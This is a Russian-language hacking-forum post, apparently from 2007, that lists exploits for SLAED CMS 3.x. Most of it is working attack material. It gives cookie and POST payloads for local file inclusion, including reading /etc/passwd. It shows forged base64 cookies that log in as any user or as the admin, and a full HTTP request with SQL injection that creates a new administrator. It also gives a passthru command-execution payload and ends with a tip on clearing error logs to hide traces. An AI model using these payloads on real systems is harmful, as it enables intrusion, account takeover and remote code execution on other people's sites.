|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
SLAED CMS <= 3.x Multiple Vulnerabilities
SLAED CMS <= 3.x Multiple Vulnerabilities
подробный разбор багов, как и почему это работает - в аттаче
1) Локальный инклуд + раскрытие пути
Нашел - +toxa+ (http://forum.antichat.ru/thread32060.html)
./index.php?newlang=asd&language=asd
Cookie: lang=asd
Требования:
- $error_reporting=1(default)
- $conf[multilingual]=1 (default)
- НЕ (register_globals=Off && magic_quotes=ON)
2) Локальный инклуд № 1
Для подгрузки ЛЮБОГО файла:
./index.php?name=FAQ&file=index
Cookie: name=../robots.txt%00
Cookie: name=../../../../../../../../../etc/passwd%00
Требования:
- magic_quotes=OFF
- register_globals=OFF
Для подгрузки PHP-файла:
./index.php?name=FAQ&file=index
Cookie: name=..;file=rss
Требования:
- register_globals=OFF
3) Локальный инклуд № 2
Для подгрузки PHP-файла:
./index.php
POST: StartModule=..&file=rss
Требования:
- register_globals=ON
4) ВХОД ПОД ЛЮБЫМ ЮЗЕРОМ
id:username:anypassword:::
1:username:12345678901234567890123456789012:10:0:
base64 = MTp1c2VybmFtZToxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Nj c4OTAxMjoxMDowOg==
Вы ДОЛЖНЫ знать логин юзера, его айди в системе, префикс куков (sys_user).
Пароль мд5 - любой, это не важно.
./index.php
Cookie: sys_user=MTp1c2VybmFtZToxMjM0NTY3ODkwMTIzNDU2Nzg5M DEyMzQ1Njc4OTAxMjoxMDowOg==;usertrue=1&1253708415= 1&-597179521
Требования:
- PHP <= 4.4.3, 5.1.4
- НЕ (register_globals=Off && magic_quotes=ON)
5) ВХОД В АДМИНКУ
id:admminname:anypassword:::
1:admminname:12345678901234567890123456789012:10:0 :
base64 = MTphZG1taW5uYW1lOjEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzND U2Nzg5MDEyOjEwOjA6
Вы ДОЛЖНЫ знать логин админа, его айди в системе, префикс куков (sys_admin).
Пароль мд5 - любой, это не важно.
./admin.php
Cookie: sys_admin=MTphZG1taW5uYW1lOjEyMzQ1Njc4OTAxMjM0NTY3 ODkwMTIzNDU2Nzg5MDEyOjEwOjA6;admintrue=1;godtrue=1 ;1253708415=1;-597179521;942252508=1;1912644014=1;2592000
Требования:
- PHP <= 4.4.3, 5.1.4
- НЕ (register_globals=Off && magic_quotes=ON)
6) Создание нового администратора
id: 9
name: Billy=0x42696c6c79
title: user=0x75736572
password: md5(Billy)=5ca49fbfb5ba90d2927d7f85f07ad74d=0x3563 61343966626662356261393064323932376437663835663037 6164373464
lang: russian=0x7275737369616e
ip: 207.46.19.190=0x3230372e34362e31392e313930
prefix=slaed_admins/**/VALUES(9,0x42696c6c79,0x75736572,1,1,0x35636134396 66266623562613930643239323764376638356630376164373 464,1,1,0x7275737369616e,0x3230372e34362e31392e313 930)/*
Код:
POST /admin.php HTTP/1.0
User-Agent: Opera/9.02 (Windows NT 5.1; U; en)
Host: 192.168.1.200
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Cookie:
Cookie2: $Version=1
Proxy-Connection: close
Content-Length: 297
Content-Type: application/x-www-form-urlencoded
aname=new_admin&aurl=http%3A%2F%2Fnew_admin&aemail=new_admin&apwd=new_admin&apwd2=new_admin&auser_new=1&op=CreateAdmin&prefix=slaed_admins%20VALUES(9,0x42696c6c79,0x75736572,1,1,0x3563613439666266623562613930643239323764376638356630376164373464,1,1,0x7275737369616e,0x3230372e34362e31392e313930)/*
Код:
Управление администраторами
9 Billy user 1 1 russian 207.46.19.190
Login: Billy
Password: Billy
9:Billy:5ca49fbfb5ba90d2927d7f85f07ad74d
OTpCaWxseTo1Y2E0OWZiZmI1YmE5MGQyOTI3ZDdmODVmMDdhZD c0ZA==
./admin.php
Cookie: admins=OTpCaWxseTo1Y2E0OWZiZmI1YmE5MGQyOTI3ZDdmODV mMDdhZDc0ZA%3D%3D
Требования:
- вы должны знать префикс таблиц (default=slaed)
ЭКСПЛОИТ ПРИЛАГАЕТСЯ
7) Исполненение команд
#### [censored!] #####
private
#### [censored!] #####
Для подгрузки PHP-файла:
- register_globals=OFF
./index.php?name=FAQ&file=index
Cookie: name=../config;file=config_global
POST: image=passthru(id);
- register_globals=ON
./index.php
POST: image=passthru(id);&StartModule=../config&file=config_global
********************************************
************* Трем логи ошибок **************
********************************************
Панель администратора-> Безопасность->
Последний раз редактировалось Elekt; 24.11.2007 в 15:07..
|